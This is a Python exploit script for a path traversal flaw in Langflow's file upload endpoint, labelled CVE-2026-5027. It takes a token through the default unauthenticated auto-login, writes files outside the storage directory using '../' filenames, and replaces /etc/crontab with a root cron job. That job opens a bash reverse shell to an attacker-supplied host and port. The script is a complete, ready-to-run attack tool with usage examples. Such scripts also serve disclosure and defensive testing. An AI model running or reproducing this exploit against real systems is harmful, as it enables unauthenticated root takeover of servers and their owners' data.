#!/usr/bin/env python3 """ Langflow <= 1.8.4 - Arbitrary File Write to RCE via Path Traversal (CVE-2026-5027) Description: The POST /api/v2/files endpoint does not sanitize the 'filename' parameter from the multipart form data, allowing an attacker to write files to arbitrary locations on the filesystem using path traversal sequences ('../'). When Langflow runs with auto-login enabled (default configuration), this vulnerability is exploitable WITHOUT authentication. An unauthenticated attacker can write arbitrary files to the server, leading to Remote Code Execution via cron jobs, SSH authorized_keys, or webshells. The vulnerability exists in upload_user_file() which passes file.filename directly to LocalStorageService.save_file() without path sanitization. Affected: Langflow <= 1.8.4 (and likely all prior versions) Vendor: https://github.com/langflow-ai/langflow (50K+ stars) Advisory: https://www.tenable.com/security/research/tra-2026-26 Impact: Unauthenticated Remote Code Execution (default config) CVSS: 8.8 (HIGH) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CWE: CWE-22 (Path Traversal) Exploit Author: Yahia Hamza (https://yh.do) """ import warnings warnings.filterwarnings("ignore") import requests import sys import argparse import time BANNER = """ ╔═══════════════════════════════════════════════════════════════╗ ║ CVE-2026-5027 — Langflow Path Traversal to RCE ║ ║ Arbitrary File Write via POST /api/v2/files ║ ║ ║ ║ Affected: Langflow <= 1.8.4 ║ ║ Impact: Unauthenticated RCE (default config) ║ ║ CVSS: 8.8 (HIGH) ║ ║ ║ ║ Exploit Author: Yahia Hamza (https://yh.do) ║ ╚═══════════════════════════════════════════════════════════════╝ """ def get_token(target): """Get access token via auto-login (default config).""" try: r = requests.get(f"{target}/api/v1/auto_login", timeout=10, verify=False) if r.status_code == 200: token = r.json().get("access_token") if token: return token, "auto-login (unauthenticated)" except: pass return None, None def login_with_creds(target, username, password): """Authenticate with credentials.""" try: r = requests.post(f"{target}/api/v1/login", json={ "username": username, "password": password, }, timeout=10, verify=False) if r.status_code == 200: return r.json().get("access_token"), "credentials" except: pass return None, None def write_file(target, token, remote_path, content): """Write arbitrary content to a path on the server via path traversal.""" headers = {"Authorization": f"Bearer {token}"} traversal = "../" * 9 filename = traversal + remote_path.lstrip("/") files = {'file': (filename, content, 'application/octet-stream')} r = requests.post(f"{target}/api/v2/files", headers=headers, files=files, timeout=15, verify=False) return r.status_code in (200, 201), r def exploit(target, username=None, password=None, lhost=None, lport=None): """Full exploitation chain.""" print(BANNER) target = target.rstrip('/') # Step 1: Obtain access token print("[*] Step 1: Obtaining access token...") if username and password: token, method = login_with_creds(target, username, password) else: token, method = get_token(target) if not token: print("[-] Authentication failed.") sys.exit(1) print(f"[+] Token obtained via {method}") print(f" {token[:40]}...") # Step 2: Deploy payload via path traversal (single write to avoid filename dedup) if lhost and lport: print(f"\n[*] Step 2: Deploying reverse shell via path traversal...") cron = f"""SHELL=/bin/bash PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin * * * * * root /bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' """ ok, r = write_file(target, token, "/etc/crontab", cron.encode()) if ok: resp = r.json() print(f"[+] Path traversal confirmed — file written outside storage directory") print(f" Server path: {resp.get('path', '')}") print(f"[+] Cron job deployed to /etc/crontab") print(f"[+] Shell incoming on {lhost}:{lport} within 60 seconds") else: print(f"[-] Exploit failed: HTTP {r.status_code}") print(f" {r.text[:200]}") sys.exit(1) else: print(f"\n[*] Step 2: Writing proof file via path traversal...") proof = f"CVE-2026-5027 | Langflow RCE | {time.strftime('%Y-%m-%d %H:%M:%S')}".encode() ok, r = write_file(target, token, "/tmp/CVE-2026-5027-proof.txt", proof) if ok: resp = r.json() print(f"[+] Path traversal confirmed — file written outside storage directory") print(f" Server path: {resp.get('path', '')}") print(f"[+] Proof written to /tmp/CVE-2026-5027-proof.txt") else: print(f"[-] Exploit failed: HTTP {r.status_code}") sys.exit(1) # Summary print(f"\n{'='*65}") print(f" EXPLOIT COMPLETE") print(f"{'='*65}") print(f" Target: {target}") print(f" CVE: CVE-2026-5027") print(f" Auth: {method}") print(f" Impact: Arbitrary File Write → RCE as root") if lhost and lport: print(f" Shell: {lhost}:{lport}") print(f"{'='*65}") def main(): parser = argparse.ArgumentParser( description="CVE-2026-5027 — Langflow Path Traversal to RCE", formatter_class=argparse.RawDescriptionHelpFormatter, epilog="""Examples: %(prog)s -t http://target:7860 %(prog)s -t http://target:7860 -u admin -p password %(prog)s -t http://target:7860 --lhost 10.0.0.1 --lport 4444 """, ) parser.add_argument("-t", "--target", required=True, help="Langflow URL") parser.add_argument("-u", "--username", help="Username (optional if auto-login enabled)") parser.add_argument("-p", "--password", help="Password") parser.add_argument("--lhost", help="Listener IP for reverse shell") parser.add_argument("--lport", type=int, help="Listener port for reverse shell") args = parser.parse_args() exploit(args.target, args.username, args.password, args.lhost, args.lport) if __name__ == "__main__": main()